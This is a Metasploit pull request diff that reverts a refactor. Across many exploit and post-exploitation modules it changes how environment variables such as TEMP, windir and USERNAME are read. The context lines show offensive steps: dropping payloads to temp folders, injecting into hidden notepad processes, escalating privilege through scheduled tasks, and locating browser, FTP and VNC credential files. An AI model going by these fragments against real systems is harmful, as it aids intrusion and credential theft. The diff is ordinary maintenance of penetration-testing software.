### PR TITLE
Revert #2782, "fix expand_path abuse"

### DIFF
--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
       win_file = file.gsub("/", "\\\\")
       if session.type == "meterpreter"
         begin
-          wintemp = session.sys.config.getenv('TEMP')
+          wintemp = session.fs.file.expand_path("%TEMP%")
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)

--- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
@@ -68,11 +68,13 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+    end
 
-      @dropped_files.delete_if do |file|
-        win_file = file.gsub("/", "\\\\")
+    @dropped_files.delete_if do |file|
+      win_file = file.gsub("/", "\\\\")
+      if session.type == "meterpreter"
         begin
-          wintemp = session.sys.config.getenv('TEMP')
+          wintemp = session.fs.file.expand_path("%TEMP%")
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)
@@ -82,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
+
       end
     end
   end

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -74,11 +74,13 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+    end
 
-      @dropped_files.each do |file|
-        win_file = file.gsub("/", "\\\\")
+    @dropped_files.each do |file|
+      win_file = file.gsub("/", "\\\\")
+      if session.type == "meterpreter"
         begin
-          wintemp = session.sys.config.getenv('WINDIR')
+          wintemp = session.fs.file.expand_path("%WINDIR%")
           win_file = "#{wintemp}\\Temp\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the
@@ -91,6 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
+
       end
     end
 

--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -72,11 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+    end
 
-      @dropped_files.delete_if do |file|
-        win_file = file.gsub("/", "\\\\")
+    @dropped_files.delete_if do |file|
+      win_file = file.gsub("/", "\\\\")
+      if session.type == "meterpreter"
         begin
-          wintemp = session.sys.config.getenv('TEMP')
+          wintemp = session.fs.file.expand_path("%TEMP%")
           win_file = "#{wintemp}\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the
@@ -89,6 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
+
       end
     end
 

--- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
+++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
@@ -66,11 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+    end
 
-      @dropped_files.delete_if do |file|
-        win_file = file.gsub("/", "\\\\")
+    @dropped_files.delete_if do |file|
+      win_file = file.gsub("/", "\\\\")
+      if session.type == "meterpreter"
         begin
-          wintemp = session.sys.config.getenv('TEMP')
+          wintemp = session.fs.file.expand_path("%TEMP%")
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)
@@ -80,6 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
+
       end
     end
   end

--- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Use the system path for executable to run except the wordpad
     if client.sys.config.sysinfo["OS"] =~ /Windows XP/
-      windir = client.sys.config.getenv('ProgramFiles')
+      windir = client.fs.file.expand_path("%ProgramFiles%")
       cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
     else # Windows 2000
         cmd = "notepad.exe"

--- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
+++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Usint this solution atm because I'm experiencing problems with railgun when trying
   # use GetTokenInformation
   def low_integrity_level?
-    tmp_dir = session.sys.config.getenv('TEMP')
+    tmp_dir = expand_path("%TEMP%")
     cd(tmp_dir)
     new_dir = "#{rand_text_alpha(5)}"
     begin

--- a/modules/exploits/windows/local/agnitum_outpost_acs.rb
+++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore["WritableDir"] and not datastore["WritableDir"].empty?
       temp_dir = datastore["WritableDir"]
     else
-      temp_dir = client.sys.config.getenv('TEMP')
+      temp_dir = expand_path("%TEMP%")
     end
 
     print_status("Using #{temp_dir} to drop malicious DLL...")

--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore["PATH"]
       payload_path = datastore["PATH"]
     else
-      payload_path = session.sys.config.getenv('TEMP')
+      payload_path = session.fs.file.expand_path("%TEMP%")
     end
 
     cmd_location = "#{payload_path}\\#{payload_filename}"

--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
+
   def check_permissions!
     # Check if you are an admin
     vprint_status('Checking admin status...')

--- a/modules/exploits/windows/local/current_user_psexec.rb
+++ b/modules/exploits/windows/local/current_user_psexec.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Build a random name for the share and directory
       share_name = Rex::Text.rand_text_alphanumeric(8)
-      drive = session.sys.config.getenv('SYSTEMDRIVE')
+      drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
       share_dir = "#{drive}\\#{share_name}"
 
       # Create them

--- a/modules/exploits/windows/local/ms10_092_schelevator.rb
+++ b/modules/exploits/windows/local/ms10_092_schelevator.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
     cmd = datastore["CMD"] || nil
     upload_fn = nil
 
-    tempdir = session.sys.config.getenv('TEMP')
+    tempdir = session.fs.file.expand_path("%TEMP%")
     if not cmd
       # Get the exe payload.
       exe = generate_payload_exe
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
     # Create a new task to do our bidding, but make sure it doesn't run.
     #
     taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
-    sysdir = session.sys.config.getenv('SystemRoot')
+    sysdir = session.fs.file.expand_path("%SystemRoot%")
     taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
 
     print_status("Creating task: #{taskname}")

--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def low_integrity_level?
-    tmp_dir = session.sys.config.getenv('USERPROFILE')
+    tmp_dir = expand_path("%USERPROFILE%")
     cd(tmp_dir)
     new_dir = "#{rand_text_alpha(5)}"
     begin
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore['TECHNIQUE'] == 'FILE'
       payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
       begin
-        tmp_dir = session.sys.config.getenv('TEMP')
+        tmp_dir = expand_path("%TEMP%")
         tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
         cd(tmp_dir)
         print_status("Trying to drop payload to #{tmp_dir}...")
@@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Spawn low integrity cmd.exe
       print_status("Spawning Low Integrity Cmd Prompt")
-      windir = session.sys.config.getenv('windir')
+      windir = client.fs.file.expand_path("%windir%")
       li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
 
       count = count_cmd_procs

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def create_proc
-    windir = session.sys.config.getenv('windir')
+    windir = expand_path("%windir%")
     cmd = "#{windir}\\System32\\notepad.exe"
     # run hidden
     begin

--- a/modules/exploits/windows/local/nvidia_nvsvc.rb
+++ b/modules/exploits/windows/local/nvidia_nvsvc.rb
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Launching notepad to host the exploit...")
 
-    windir = session.sys.config.getenv('windir')
+    windir = expand_path("%windir%")
     cmd = "#{windir}\\SysWOW64\\notepad.exe"
     process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
     host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Creates a temp notepad.exe to inject payload in to given the payload
   # Returns process PID
   def create_temp_proc()
-    windir = client.sys.config.getenv('windir')
+    windir = client.fs.file.expand_path("%windir%")
     # Select path of executable to run depending the architecture
     if @payload_arch.first== "x86" and client.platform =~ /x86/
       cmd = "#{windir}\\System32\\notepad.exe"

--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   # Writes script to target host
   def write_script_to_target(vbs,name)
-    tempdir = session.sys.config.getenv('TEMP')
+    tempdir = expand_path("%TEMP%")
     if name == nil
       tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
     else

--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
   def check
     os = sysinfo["OS"]
     if os =~ /windows/i
-      file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
+      file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
       major, minor, build, revision, branch = file_version(file_path)
       vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
 

--- a/modules/exploits/windows/local/s4u_persistence.rb
+++ b/modules/exploits/windows/local/s4u_persistence.rb
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Returns path for XML and payload
   def generate_path(rexename)
     # Generate a path to write payload and XML
-    path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    path = datastore['PATH'] || expand_path("%TEMP%")
     xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
     rexe_path = "#{path}\\#{rexename}"
     return xml_path,rexe_path

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -59,9 +59,8 @@ class Metasploit3 < Msf::Exploit::Local
 
     exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
 
-    dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
-    sysdir = dir_env['SystemRoot']
-    tmpdir = dir_env['TEMP']
+    sysdir = session.fs.file.expand_path("%SystemRoot%")
+    tmpdir = session.fs.file.expand_path("%TEMP%")
 
     print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
     begin
@@ -123,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Local
         moved = false
         configed = false
         #default path, but there should be an ImagePath registry key
-        source = "#{sysdir}\\system32\\#{serv}.exe"
+        source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
         #get path to exe; parse out quotes and arguments
         sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
         sourcemaybe = session.fs.file.expand_path(sourceorig)

--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
       end
     end
 
-    win_temp = client.sys.config.getenv('TEMP')
+    win_temp = client.fs.file.expand_path("%TEMP%")
     win_file = "#{win_temp}\\#{payload_exe}"
     print_status("Attempting to delete #{win_file} ...")
     client.shell_command_token(%Q|attrib.exe -r #{win_file}|)

--- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
+++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     begin
       print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
-      windir = client.sys.config.getenv('WINDIR')
+      windir = client.fs.file.expand_path("%WINDIR%")
       client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
       print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
       cmd = "#{windir}\\system32\\attrib.exe -r " +

--- a/modules/exploits/windows/novell/netiq_pum_eval.rb
+++ b/modules/exploits/windows/novell/netiq_pum_eval.rb
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
       win_file = file.gsub("/", "\\\\")
       if session.type == "meterpreter"
         begin
-          windir = session.sys.config.getenv('WINDIR')
+          windir = session.fs.file.expand_path("%WINDIR%")
           win_file = "#{windir}\\system32\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the

--- a/modules/post/linux/manage/download_exec.rb
+++ b/modules/post/linux/manage/download_exec.rb
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
   end
 
   def exists_exe?(exe)
-    path = session.sys.config.getenv("PATH")
+    path = expand_path("$PATH")
     if path.nil? or path.empty?
       return false
     end

--- a/modules/post/multi/gather/apple_ios_backup.rb
+++ b/modules/post/multi/gather/apple_ios_backup.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
       paths = enum_users_unix
     when /win/
       @platform = :windows
-      drive = session.sys.config.getenv('SystemDrive')
+      drive = session.fs.file.expand_path("%SystemDrive%")
       os = session.sys.config.sysinfo['OS']
 
       if os =~ /Windows 7|Vista|2008/
@@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.sys.config.getenv('USERNAME')
+      session.fs.file.expand_path("%USERNAME%")
     else
       session.shell_command("whoami").chomp
     end

--- a/modules/post/multi/gather/env.rb
+++ b/modules/post/multi/gather/env.rb
@@ -54,8 +54,9 @@ class Metasploit3 < Msf::Post
       var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
       output = []
       var_names.delete(nil)
-      session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
-        output << "#{k}=#{v}"
+      var_names.flatten.uniq.sort.each do |v|
+        # Emulate the output of set and env, e.g. VAR=VALUE
+        output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
       end
       @output = output.join("\n")
       @ltype = "windows.environment"

--- a/modules/post/multi/gather/filezilla_client_cred.rb
+++ b/modules/post/multi/gather/filezilla_client_cred.rb
@@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.sys.config.getenv('USERNAME')
+      session.fs.file.expand_path("%USERNAME%")
     else
       session.shell_command("whoami").chomp
     end

--- a/modules/post/multi/gather/firefox_creds.rb
+++ b/modules/post/multi/gather/firefox_creds.rb
@@ -277,6 +277,7 @@ class Metasploit3 < Msf::Post
   def get_ff_and_loot_path
     @paths = {}
     check_paths = []
+    drive = expand_path("%SystemDrive%")
     loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
 
     case @platform
@@ -285,9 +286,7 @@ class Metasploit3 < Msf::Post
         print_error("You need root privileges on this platform for DECRYPT option")
         return false
       end
-      env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
-      tmpdir = env_vars['TEMP'] + "\\"
-      drive = env_vars['SystemDrive']
+      tmpdir = expand_path("%TEMP%") + "\\"
       # this way allows for more independent use of meterpreter
       # payload (32 and 64 bit) and cleaner code
       check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
@@ -644,9 +643,9 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.sys.config.getenv('USERNAME')
+      return session.fs.file.expand_path("%USERNAME%")
     else
-      session.shell_command("whoami").chomp
+      return session.shell_command("whoami").chomp
     end
   end
 end

--- a/modules/post/multi/gather/pidgin_cred.rb
+++ b/modules/post/multi/gather/pidgin_cred.rb
@@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.sys.config.getenv('USERNAME')
+      session.fs.file.expand_path("%USERNAME%")
     else
       session.shell_command("whoami").chomp
     end

--- a/modules/post/multi/gather/thunderbird_creds.rb
+++ b/modules/post/multi/gather/thunderbird_creds.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
       base = "/Users/#{user}/Library/Thunderbird/Profiles/"
     when /win/
       if session.type =~ /meterpreter/
-        user_profile = session.sys.config.getenv('APPDATA')
+        user_profile = session.fs.file.expand_path("%APPDATA%")
       else
         user_profile = cmd_exec("echo %APPDATA%").strip
       end

--- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb
+++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb
@@ -176,7 +176,7 @@ EOS
     ring0_code.gsub!('TPTP', [pid].pack('V'))
 
     # Create the malicious Keyboard Layout file...
-    tmpdir = session.sys.config.getenv('TEMP')
+    tmpdir = session.fs.file.expand_path("%TEMP%")
     fname = "p0wns.boom"
     dllpath = "#{tmpdir}\\#{fname}"
     fd = session.fs.file.new(dllpath, 'wb')

--- a/modules/post/windows/escalate/net_runtime_modify.rb
+++ b/modules/post/windows/escalate/net_runtime_modify.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
     paths = []
     services = []
     vuln = ""
-    @temp = session.sys.config.getenv('TEMP')
+    @temp = session.fs.file.expand_path("%TEMP%")
 
     if init_railgun() == :error
       return

--- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb
+++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb
@@ -233,14 +233,12 @@ class Metasploit3 < Msf::Post
 
     print_status("Searching BulletProof FTP Client installation directory...")
     # BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
-    progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
-    progfilesx86 = prog_files_env['ProgramFiles(X86)']
-    if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
-      program_files = progfilesx86 # x64
+    program_files_x86 = expand_path('%ProgramFiles(X86)%')
+    if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
+      program_files = program_files_x86 #x64
     else
-      program_files = progfiles_env['ProgramFiles'] # x86
+      program_files = expand_path('%ProgramFiles%') #x86
     end
-
     session.fs.dir.foreach(program_files) do |dir|
       if dir =~ /BulletProof FTP Client/
         vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")

--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    drive = session.sys.config.getenv('SystemDrive')
+    drive = session.fs.file.expand_path("%SystemDrive%")
     case session.platform
     when /win64/i
       @progs = drive + '\\Program Files (x86)\\'
@@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
   end
 
   def whoami
-    return session.sys.config.getenv('USERNAME')
+    return session.fs.file.expand_path("%USERNAME%")
   end
 end

--- a/modules/post/windows/gather/credentials/steam.rb
+++ b/modules/post/windows/gather/credentials/steam.rb
@@ -40,12 +40,10 @@ class Metasploit3 < Msf::Post
     # Steam client is only 32 bit so we need to know what arch we are on so that we can use
     # the correct program files folder.
     # We will just use an x64 only defined env variable to check.
-    progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
-    progfilesx86 = prog_files_env['ProgramFiles(X86)']
-    if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
-      progs = progfilesx86 # x64
+    if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
+      progs = expand_path('%ProgramFiles(X86)%') #x64
     else
-      progs = progfiles_env['ProgramFiles'] # x86
+      progs = expand_path('%ProgramFiles%') #x86
     end
     path = progs + '\\Steam\\config'
 

--- a/modules/post/windows/gather/credentials/tortoisesvn.rb
+++ b/modules/post/windows/gather/credentials/tortoisesvn.rb
@@ -103,7 +103,8 @@ class Metasploit3 < Msf::Post
   def get_config_files
     # Determine if TortoiseSVN is installed and parse config files
     savedpwds = 0
-    path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
+    user_appdata = session.fs.file.expand_path("%APPDATA%")
+    path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
     print_status("Checking for configuration files in: #{path}")
 
     begin

--- a/modules/post/windows/gather/credentials/total_commander.rb
+++ b/modules/post/windows/gather/credentials/total_commander.rb
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
   end
 
   def check_systemroot
-    winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
+    winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
     check_other(winpath)
   end
 

--- a/modules/post/windows/gather/credentials/vnc.rb
+++ b/modules/post/windows/gather/credentials/vnc.rb
@@ -98,15 +98,11 @@ class Metasploit3 < Msf::Post
     locations = []
 
     #Checks
-    progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
-    progfiles_env.each do |k, v|
-      next if v.blank?
-      locations << {:name => 'UltraVNC',
-        :check_file => "#{v}\\UltraVNC\\ultravnc.ini",
-        :pass_variable => 'passwd=',
-        :viewonly_variable => 'passwd2=',
-        :port_variable => 'PortNumber='}
-    end
+    locations << {:name => 'UltraVNC',
+      :check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
+      :pass_variable => 'passwd=',
+      :viewonly_variable => 'passwd2=',
+      :port_variable => 'PortNumber='}
 
     locations << {:name => 'WinVNC3_HKLM',
       :check_reg => 'HKLM\\Software\\ORL\\WinVNC3',

--- a/modules/post/windows/gather/credentials/winscp.rb
+++ b/modules/post/windows/gather/credentials/winscp.rb
@@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
 
   def run
     print_status("Looking for WinSCP.ini file storage...")
-    get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
+    get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
     print_status("Looking for Registry Storage...")
     get_reg()
     print_status("Done!")

--- a/modules/post/windows/gather/dumplinks.rb
+++ b/modules/post/windows/gather/dumplinks.rb
@@ -53,8 +53,7 @@ class Metasploit3 < Msf::Post
     user = session.sys.config.getuid
     userpath = nil
     useroffcpath = nil
-    env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
-    sysdrv = env_vars['SystemDrive']
+    sysdrv = session.fs.file.expand_path("%SystemDrive%")
     if os =~ /Windows 7|Vista|2008/
       userpath = sysdrv + "\\Users\\"
       lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@@ -77,7 +76,7 @@ class Metasploit3 < Msf::Post
         userinfo = {}
       end
     else
-      uservar = env_vars['USERNAME']
+      uservar = session.fs.file.expand_path("%USERNAME%")
       userinfo['username'] = uservar
       userinfo['userpath'] = userpath + uservar + lnkpath
       userinfo['useroffcpath'] = userpath + uservar + officelnkpath

--- a/modules/post/windows/gather/enum_chrome.rb
+++ b/modules/post/windows/gather/enum_chrome.rb
@@ -285,8 +285,7 @@ class Metasploit3 < Msf::Post
     host = session.session_host
 
     #Get Google Chrome user data path
-    env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
-    sysdrive = env_vars['SYSTEMDRIVE'].strip
+    sysdrive = expand_path("%SYSTEMDRIVE%").strip
     if directory?("#{sysdrive}\\Users")
       @profiles_path = "#{sysdrive}/Users"
       @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
@@ -311,7 +310,7 @@ class Metasploit3 < Msf::Post
     else
       uid = session.sys.config.getuid
       print_status "Running as user '#{uid}'..."
-      usernames << env_vars['USERNAME'].strip
+      usernames << expand_path("%USERNAME%").strip
     end
 
     has_sqlite3 = true

--- a/modules/post/windows/gather/enum_db.rb
+++ b/modules/post/windows/gather/enum_db.rb
@@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
       return results
     end
 
-    windir = session.sys.config.getenv('windir')
+    windir = session.fs.file.expand_path("%windir%")
     getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
 
     data = nil
@@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
     elsif exist?(val_location + "\\my.cnf")
       data = read_file(val_location + "\\my.cnf")
     else
-      sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
+      sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
       getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
       getfile.each do |file|
         if exist?("#{file['path']}\\#{file['name']}")

--- a/modules/post/windows/gather/enum_files.rb
+++ b/modules/post/windows/gather/enum_files.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
 
 
   def download_files(location, file_type)
-    sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
+    sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
     sysnfo = client.sys.config.sysinfo['OS']
     profile_path_old = sysdriv + "\\Documents and Settings\\"
     profile_path_new = sysdriv + "\\Users\\"

--- a/modules/post/windows/gather/enum_ie.rb
+++ b/modules/post/windows/gather/enum_ie.rb
@@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
     xp_c = "\\Cookies\\index.dat"
     h_paths = []
     c_paths = []
-    base = session.sys.config.getenv('USERPROFILE')
+    base = session.fs.file.expand_path("%USERPROFILE%")
     if host['OS'] =~ /(Windows 7|2008|Vista)/
       h_paths << base + vist_h
       h_paths << base + vist_hlow

--- a/modules/post/windows/gather/enum_powershell_env.rb
+++ b/modules/post/windows/gather/enum_powershell_env.rb
@@ -28,8 +28,7 @@ class Metasploit3 < Msf::Post
     users = []
     user = session.sys.config.getuid
     path4users = ""
-    env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
-    sysdrv = env_vars['SystemDrive']
+    sysdrv = session.fs.file.expand_path("%SystemDrive%")
 
     if os =~ /Windows 7|Vista|2008/
       path4users = sysdrv + "\\Users\\"
@@ -50,7 +49,7 @@ class Metasploit3 < Msf::Post
       end
     else
       userinfo = {}
-      uservar = env_vars['USERNAME']
+      uservar = session.fs.file.expand_path("%USERNAME%")
       userinfo['username'] = uservar
       userinfo['userappdata'] = path4users + uservar + profilepath
       users << userinfo
@@ -90,7 +89,7 @@ class Metasploit3 < Msf::Post
       end
       if powershell_version =~ /2./
         print_status("Powershell Modules:")
-        powershell_module_path = session.sys.config.getenv('PSModulePath')
+        powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
         session.fs.dir.foreach(powershell_module_path) do |m|
           next if m =~ /^(\.|\.\.)$/
           print_status("\t#{m}")

--- a/modules/post/windows/gather/enum_prefetch.rb
+++ b/modules/post/windows/gather/enum_prefetch.rb
@@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post
     print_prefetch_key_value
     print_timezone_key_values(key_value)
     print_good("Current UTC Time: %s" % Time.now.utc)
-    sys_root = session.sys.config.getenv('SYSTEMROOT')
+    sys_root = expand_path("%SYSTEMROOT%")
     full_path = sys_root + "\\Prefetch\\"
     file_type = "*.pf"
     print_status("Gathering information from remote system. This will take awhile..")

--- a/modules/post/windows/gather/enum_unattend.rb
+++ b/modules/post/windows/gather/enum_unattend.rb
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
   # Initialize all 7 possible paths for the answer file
   #
   def init_paths
-    drive = session.sys.config.getenv('SystemDrive')
+    drive = session.fs.file.expand_path("%SystemDrive%")
 
     files =
       [

--- a/modules/post/windows/manage/download_exec.rb
+++ b/modules/post/windows/manage/download_exec.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post
     register_advanced_options(
       [
         OptString.new('EXEC_STRING',   [false, 'Execution parameters when run from download directory' ]),
-        OptInt.new(   'EXEC_TIMEOUT',  [true, 'Execution timeout', 60 ]),
+        OptInt.new('EXEC_TIMEOUT',     [true, 'Execution timeout', 60 ]),
         OptBool.new(  'DELETE',        [true, 'Delete file after execution', false ]),
       ], self.class)
 
